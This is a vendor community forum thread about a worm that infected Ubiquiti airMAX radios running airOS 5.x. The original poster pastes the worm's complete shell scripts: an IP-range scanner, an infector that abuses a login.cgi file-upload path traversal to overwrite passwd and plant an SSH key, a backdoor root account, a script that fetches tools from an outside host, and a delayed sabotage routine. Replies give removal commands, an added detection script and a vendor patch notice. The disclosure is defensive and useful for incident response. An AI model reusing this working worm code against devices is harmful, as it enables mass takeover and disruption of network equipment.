Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33
Accepted Solution

Virus attack - URGENT @UBNT

Hi there,

 

Since this afternoon MET we have had virus attacks on all airMAX antennas with access to/from the Internet.

It's a self-distributing virus, so, once it can "see" neighbouring antennas within the same subnet, it attacks the others.

Like all other viruses, it lives within the /etc/persistent path, creates a subpath ./.mf and a tarball mf.tar, and of course uses rc.poststart.

 

Here the path structure:

 

XM.v5.5.2# cd /etc/persistent/

 

XM.v5.5.2# ls
cardlist.txt dropbear_rsa_host_key rc.poststart
dropbear_dss_host_key mf.tar

 

XM.v5.5.2# cat rc.poststart
cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother

 

XM.v5.5.2# ls -al
drwxr-xr-x 3 root admin 160 Aug 16 2012 .
drwxr-xr-x 10 root admin 820 Aug 16 2012 ..
drwxrwxr-x 2 1001 1001 320 May 13 11:23 .mf
lrwxrwxrwx 1 root admin 21 Jan 1 1970 cardlist.txt -> /usr/etc/cardlist.txt
-rw------- 1 root admin 457 Aug 16 2012 dropbear_dss_host_key
-rw------- 1 root admin 427 Aug 16 2012 dropbear_rsa_host_key
-rw------- 1 root admin 20480 May 13 11:21 mf.tar
-rwxr-xr-x 1 root admin 65 May 13 11:21 rc.poststart

 

XM.v5.5.2# cd .mf

 

XM.v5.5.2# ls -al
drwxrwxr-x 2 1001 1001 320 May 13 11:23 .
drwxr-xr-x 3 root admin 160 Aug 16 2012 ..
-rwxr-xr-x 1 root admin 64372 May 19 2009 curl
-rwxrwxr-x 1 1001 1001 670 May 12 20:39 download
-rwxrw-r-- 1 1001 1001 747 May 12 20:44 f u c k
-rwxrw-r-- 1 1001 1001 199 May 12 20:44 f u c k e r
-rwxrw-r-- 1 1001 1001 480 May 12 23:30 i
-rwxrwxr-x 1 1001 1001 944 May 12 22:28 infect
-rw-r--r-- 1 root admin 1062608 May 19 2009 libcrypto.so.0.9.8
-rwxr-xr-x 1 root admin 207852 May 19 2009 libcurl.so.4
-rw-r--r-- 1 root admin 223552 May 19 2009 libssl.so.0.9.8
-rw------- 1 root admin 20480 Aug 16 2012 mf.tar
-rw-r--r-- 1 1001 1001 427 May 12 19:38 mfid
-rw-rw-r-- 1 1001 1001 232 May 12 19:39 mfid.pub
-rwxrw-r-- 1 1001 1001 952 May 13 06:39 mother
-rwxrwxr-x 1 1001 1001 1434 May 13 06:36 search

 

We're just cleaning thousands of CPEs ...

 

Hope it's helpful...

 

@ubnt

It's attacking any FW version. I think it's using SSH port 22... Please investigate!!!

 

Greez

AMX


Accepted Solutions
Ubiquiti Employee
Posts: 7,892
Registered: ‎11-27-2012
Kudos: 2149
Solutions: 498
Contributions: 73

Re: Virus attack - URGENT @UBNT

[ Edited ]

Hi everyone,

Updating this post to point to the most up-to-date info in the airMAX Blog.

 

http://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/b...

 

EDIT: Added updated removal tool v1.0

 



All Replies
Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat search
#!/bin/sh
trap '' HUP
chmod +x /etc/persistent/.mf/curl
cd /etc/persistent/.mf/

ip=$(ifconfig ath0 2>/dev/null | grep 'inet ' | sed "s/.*inet addr:\([^ ]*\).*/\1/g")
if [ -z "$ip" ] ; then
ip=$(ifconfig br0 2>/dev/null | grep 'inet ' | sed "s/.*inet addr:\([^ ]*\).*/\1/g")
fi
if [ -z "$ip" ] ; then
ip=$(ifconfig ppp0 2>/dev/null | grep 'inet ' | sed "s/.*inet addr:\([^ ]*\).*/\1/g")
fi
p1=$(echo $ip | cut -d "." -f1)
test ! -z "$p1" || p1=1
test -z "$1" || p1=$(($p1+$1))
p2=$(echo $ip | cut -d "." -f2)
test ! -z "$p2" || p2=0
test -z "$2" || p2=$(($p2+$2))
p3=$(echo $ip | cut -d "." -f3)
test ! -z "$p3" || p3=0
p3c=0
p2c=0
p1c=0
p4=0
p5=0

while [ $p1c -lt 224 ]
do
while [ $p2c -lt 255 ]
do
while [ $p3c -lt 255 ]
do
while [ $p4 -lt 255 ]
do
while [ $p5 -lt 4 ]
do
if [ $p5 = 0 ] ; then
ip="$p1.$p2.$p3.$p4"
fi
if [ $p5 = 1 ] ; then
ip="$p3.$p4.$p2.$p1"
fi
if [ $p5 = 2 ] ; then
ip="$p1.$p3.$p2.$p4"
fi
if [ $p5 = 3 ] ; then
rn="$(dd if=/dev/urandom bs=4 count=1)" 2>/dev/null >/dev/null
num=`echo $rn | hexdump -b 2>/dev/null | head -n 1 | cut -f 2-5 -d' ' | tr " " "."`
ip=$num
fi

/etc/persistent/.mf/infect $ip

p5=$((p5+1))
done
p5=0
p4=$((p4+1))
done
p4=0
p3=$((p3+1))
if [ "$p3" -gt 255 ] ; then p3=0 ; fi
p3c=$((p3c+1))
done
p4=0
p3c=0
p3=0
p2=$((p2+1))
if [ "$p2" -gt 255 ] ; then p2=0 ; fi
p2c=$((p2c+1))
done
p4=0
p3=0
p3c=0
p2=0
p2c=0
p1=$((p1+1))
if [ "$p1" -gt 223 ] ; then p1=1 ; fi
p1c=$((p1c+1))
done

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat download
#!/bin/sh
per=/etc/persistent/.mf

test -d /tmp/down || mkdir /tmp/down
cd /tmp/down

dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}

 

test -e $per/curl || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'

 

SuperUser
Posts: 13,119
Registered: ‎02-03-2013
Kudos: 6821
Solutions: 544
Contributions: 2

Re: Virus attack - URGENT @UBNT

What passwords were on these radios if any?

ubiquiti certified trainer :: ubwa | uewa
Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat f u c k
#!/bin/sh
url="http://$1"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"

url="https://$1"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat f u c k er
#!/bin/sh
if [ -z "$1" ] ; then
f=/tmp/inf
else
f=$1
fi
cd /etc/persistent/.mf

cat $f | sort -r | while read ip ; do
./f u c k $ip
done

(sleep 99999; /etc/persistent/f u c k e r >/dev/null 2>/dev/null) &

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat infect
#!/bin/sh
ip=$1
trap '' HUP
chmod +x /etc/persistent/.mf/curl
cd /etc/persistent/.mf/

if [ "$2" = "dbss" ] ; then
ssh -f -y -y -i mfid mother@${ip} "tar -xf mf.tar ; /etc/persistent/.mf/i"
exit 0
fi

cu() {
wh=$1
to=$2
ur=$3
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -m 4 -F "file=@/etc/$wh;filename=../../etc/$to" -H "Expect:" "$ur/login.cgi" -k 2>/dev/null >/dev/null
}

is=`LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -L -k -c /tmp/ac -m 3 $ip 2>/dev/null | grep airos | wc -l`
if [ "$is" = "1" ] ; then
echo $ip >> /tmp/inf
cu passwd passwd http://${ip}
cu persistent/.mf/mfid.pub dropbear/authorized_keys http://${ip}
cu persistent/.mf/mf.tar persistent/mf.tar http://${ip}
cu passwd passwd https://${ip}
cu persistent/.mf/mfid.pub dropbear/authorized_keys https://${ip}
cu persistent/.mf/mf.tar persistent/mf.tar https://${ip}

( /etc/persistent/.mf/infect $ip dbss ) &
( sleep 15 ; killall ssh ) &
sleep 17
fi

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat i
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd /etc/persistent ; tar -xf mf.tar ; $per/.mf/mother" >> $per/rc.poststart
chmod +x $per/rc.poststart
rm $per/mother
rm $per/download
rm $per/f u c k e r
rm $per/search
rm $per/curl
rm $per/lib*
cfgmtd -w -p /etc/

reboot -n -f >/dev/null &

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat mother
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd

iptables -I INPUT -p tcp --dport 80 -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null

cp $per/mf.tar $per/.mf/

(sleep 90 ; $per/.mf/download )&
(sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&

(sleep 66666 ; $per/.mf/f u c k e r 2>/dev/null >/dev/null )&
(sleep 666666 ; sed -i 's/wireless.1.ssid=.*/wireless.1.ssid=motherf u c k e r/' /tmp/system.cfg ; sed -i 's/radio.1.mode=.*/radio.1.mode=Master/' /tmp/system.cfg ; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

special ones...of course NOT standard PWs and also other USER than the standards

SuperUser
Posts: 13,119
Registered: ‎02-03-2013
Kudos: 6821
Solutions: 544
Contributions: 2

Re: Virus attack - URGENT @UBNT


amx wrote:

special ones...of course NOT standard PWs and also other USER than the standards


What firmware? There was an upgrade last summer to prevent an exploit.

ubiquiti certified trainer :: ubwa | uewa
SuperUser
Posts: 10,882
Registered: ‎12-08-2008
Kudos: 7682
Solutions: 481
Contributions: 1

Re: Virus attack - URGENT @UBNT


ClaudeSS wrote:

amx wrote:

special ones...of course NOT standard PWs and also other USER than the standards


What firmware? There was an upgrade last summer to prevent an exploit.


The CLI prompt in the OP looks like 5.5.2...

Jim

"How can anyone trust scientists? If new evidence comes along, they change their minds!" Politician's joke (sort of...)

"Humans are allergic to change. They love to say, 'We've always done it this way.' I try to fight that." Admiral Grace Hopper, USN, Computer Scientist
Ancient Member
Posts: 27,328
Registered: ‎05-05-2012
Kudos: 8523
Solutions: 1312

Re: Virus attack - URGENT @UBNT


ClaudeSS wrote:

amx wrote:

special ones...of course NOT standard PWs and also other USER than the standards


What firmware? There was an upgrade last summer to prevent an exploit.


5.5.2 according to the OP.

 

http://community.ubnt.com/t5/airMAX-General-Discussion/5-6-3-and-5-6-4-Vulnerability/m-p/1562915#M54...

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

at this moment any FW 5.x.x

New Member
Posts: 11
Registered: ‎03-10-2009

Re: Virus attack - URGENT @UBNT

How to remove it completely?
Any official position from Ubiquiti? A tutorial of the Skynet type?

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

I didn't see anything from UBNT at this moment. Here's the removal:

 

cd /etc/persistent/
rm mf.tar
rm rc.poststart
rm -R .mf
cfgmtd -p /etc/persistent/ -w
reboot
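The indicators the OP's listing shows (mf.tar, the hidden .mf directory, the rc.poststart launcher, the added mother account) and the removal steps posted just above, as an added example that is not code from the thread, from Ubiquiti or from the worm: a POSIX sh checker and cleaner that runs against a staged copy of an airOS /etc tree. The paths it inspects are the ones the posted scripts use; the sample trees, the placeholder file contents and the function names are constructed for this example. It goes beyond the posted one-liner in one respect: it also strips the mother line from passwd, which the posted i and mother scripts are shown adding. It only reports dropbear/authorized_keys for manual review, since a legitimate admin key may live there. On a real radio the commit to flash (cfgmtd -w -p /etc/) and the reboot from the posted procedure still follow the clean-up.

```shell
#!/bin/sh
# Added example, not from the thread: check and clean a staged airOS /etc tree
# for the artifacts the posted worm scripts leave behind. ETC is the tree root
# (on a device that would be /etc; here it is a constructed copy).

# Print each indicator found. Return 0 when clean, 1 when anything matched.
check_airos_etc() {
    etc=$1
    per="$etc/persistent"
    found=0
    if [ -e "$per/mf.tar" ]; then
        echo "indicator: $per/mf.tar present"; found=1
    fi
    if [ -d "$per/.mf" ]; then
        echo "indicator: hidden directory $per/.mf present"; found=1
    fi
    # rc.poststart runs at boot; the worm appends the line that unpacks mf.tar
    # and starts .mf/mother (two -e patterns: POSIX grep has no \| alternation)
    if [ -f "$per/rc.poststart" ] && grep -q -e 'mf\.tar' -e '\.mf/mother' "$per/rc.poststart"; then
        echo "indicator: rc.poststart launches .mf/mother"; found=1
    fi
    # the i / mother scripts append a uid 0 account named mother to passwd
    if [ -f "$etc/passwd" ] && grep -q '^mother:' "$etc/passwd"; then
        echo "indicator: uid 0 account 'mother' in passwd"; found=1
    fi
    # infect uploads mfid.pub here; a legitimate key can also exist, so only flag for review
    if [ -s "$etc/dropbear/authorized_keys" ]; then
        echo "review: dropbear/authorized_keys present, verify every key is yours"
    fi
    return $found
}

# Mirror the removal steps posted in the thread on the staged tree, plus the
# passwd clean-up. On a real radio follow with 'cfgmtd -w -p /etc/' and a reboot.
clean_airos_etc() {
    etc=$1
    per="$etc/persistent"
    rm -f "$per/mf.tar" "$per/rc.poststart"
    rm -rf "$per/.mf"
    if [ -f "$etc/passwd" ]; then
        grep -v '^mother:' "$etc/passwd" > "$etc/passwd.tmp" || true
        mv "$etc/passwd.tmp" "$etc/passwd"
    fi
}

# Constructed infected tree: names and the rc.poststart line follow the OP's
# listing, file contents are empty placeholders, the passwd hash is 'x'.
make_infected_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/persistent/.mf" "$root/dropbear"
    : > "$root/persistent/mf.tar"
    : > "$root/persistent/.mf/mother"
    echo 'cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother' > "$root/persistent/rc.poststart"
    printf 'root:x:0:0:Administrator:/etc/persistent:/bin/sh\nmother:x:0:0:Administrator:/etc/persistent:/bin/sh\n' > "$root/passwd"
    echo 'ssh-rsa AAAAconstructedkey== constructed@example' > "$root/dropbear/authorized_keys"
    echo "$root"
}

# Constructed clean tree: only the stock host keys and a root account.
make_clean_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/persistent" "$root/dropbear"
    : > "$root/persistent/dropbear_rsa_host_key"
    : > "$root/persistent/dropbear_dss_host_key"
    echo 'root:x:0:0:Administrator:/etc/persistent:/bin/sh' > "$root/passwd"
    echo "$root"
}

# Demo run on the constructed infected tree.
tree=$(make_infected_tree)
if check_airos_etc "$tree"; then
    echo "$tree: clean"
else
    echo "$tree: infected, cleaning"
    clean_airos_etc "$tree"
    check_airos_etc "$tree" && echo "$tree: clean after removal"
fi
rm -rf "$tree"
```

Point the checker at a copy of a radio's /etc pulled over SSH (or run it on the device itself with ETC=/etc) and act on every line it prints; the review line about authorized_keys needs a human to compare the keys against the ones you actually deployed.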

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

As the virus needs to download curl, also block this domain on your DNS:

 

downloads.openwrt.org

New Member
Posts: 12
Registered: ‎12-12-2013
Kudos: 2

Re: Virus attack - URGENT @UBNT

 
Hello, since this morning all radios with firmware 5.5.x have been modified...
To correct this, enter through SSH and delete everything with the commands (you can copy and paste):

cd /etc/persistent; rm -R mcuser; rm -R .mf; rm *; cfgmtd -w -p /etc/; killall -9 search; killall -9 mother; killall -9 sleep; reboot

After restarting, switch ports 80 and 22 and 443... and upgrade to version 5.6.4.

For me it worked well.
Ubiquiti Employee
Posts: 7,892
Registered: ‎11-27-2012
Kudos: 2149
Solutions: 498
Contributions: 73

Re: Virus attack - URGENT @UBNT

As @LLigetfa linked above...

 

Anything prior to the following should be considered insecure.  

 

5.5.11 XM/TI.

5.5.10u2 XW 

5.6.2 XW/XM/TI

 

There have been some additional security improvements in 5.6.3/4.

 

 

If you haven't already, please subscribe to the airMAX blog for new release and security notices. It is very likely these devices were exploited using a known vulnerability that was addressed last year. This exploit would allow an unauthenticated (no password required) user root/admin level control of any device with http/https exposed.

 

http://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGate...

 

 

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

Hi James.

 

Thanks for the information.

 

Ahm... just for my info: we're one of the largest WISPs in Spain and we didn't receive any vulnerability warning?

Neither directly nor via our wholesale partner Landatel!?

 

You will pay the costs for cleaning up all customers' CPEs affected by this and other issues provoked by UBNT software failures?

 

Thanks in advance for your feedback!
